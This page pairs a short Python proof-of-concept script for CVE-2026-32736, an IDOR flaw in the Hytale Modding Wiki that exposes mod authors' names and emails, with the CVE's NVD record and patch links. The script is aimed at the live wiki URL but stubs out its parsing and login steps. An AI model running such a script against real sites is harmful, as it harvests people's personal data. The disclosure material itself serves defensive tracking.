CVE-2026-32736

import requests # CVE-2026-32736 PoC - IDOR in Hytale Modding Wiki # This PoC demonstrates how an authenticated user can access # author personal information via IDOR vulnerability BASE_URL = "https://wiki.hytalemodding.com" TARGET_SLUG = "example-mod-slug" # Replace with actual mod slug def exploit_idor(): """ Exploit IDOR vulnerability to retrieve author information without proper authorization check. """ session = requests.Session() # Step 1: Create account and authenticate # (Skipped - assume attacker already has account) # Step 2: Access mod page with known slug mod_url = f"{BASE_URL}/mod/{TARGET_SLUG}" response = session.get(mod_url) if response.status_code == 200: # Extract author information from response # The vulnerable endpoint directly returns author data # without verifying requester's permissions author_info = parse_author_details(response.text) print(f"Author Name: {author_info['name']}") print(f"Author Email: {author_info['email']}") else: print("Failed to access mod page") def parse_author_details(html_content): """ Parse author details from HTML response In vulnerable version, author info is exposed without auth check """ # Implementation depends on actual page structure return { "name": "Extracted from page", "email": "Extracted from page" } if __name__ == "__main__": exploit_idor()

{"cve": {"id": "CVE-2026-32736", "sourceIdentifier": "[email protected]", "published": "2026-03-18T23:17:29.883", "lastModified": "2026-05-05T14:19:28.233", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Hytale Modding Wiki is a free service for Hytale mods to host their documentation & wikis. An Insecure Direct Object Reference (IDOR) vulnerability in versions of the wiki prior to 1.0.0 exposes mod authors' personal information - including full names and email addresses - to any authenticated user who visits a mod page. Any user who creates an account can access sensitive author details by simply navigating to a mod's page via its slug. Version 1.0.0 fixes the issue."}, {"lang": "es", "value": "La Wiki de Modding de Hytale es un servicio gratuito para que los mods de Hytale alojen su documentación y wikis. Una vulnerabilidad de Referencia Directa a Objeto Insegura (IDOR) en versiones de la wiki anteriores a la 1.0.0 expone la información personal de los autores de mods - incluyendo nombres completos y direcciones de correo electrónico - a cualquier usuario autenticado que visita una página de mod. Cualquier usuario que crea una cuenta puede acceder a detalles sensibles del autor simplemente navegando a la página de un mod a través de su slug. La versión 1.0.0 soluciona el problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:hytalemodding:wiki:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.0.0", "matchCriteriaId": "C10A1B6F-4C51-4310-AAB3-728A56C02F08"}]}]}], "references": [{"url": "https://github.com/HytaleModding/wiki/commit/4a96b3f9bce9a9d34030c39a8d6e4c6b6183f13d", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/HytaleModding/wiki/security/advisories/GHSA-xvq7-wwhx-x2fh", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}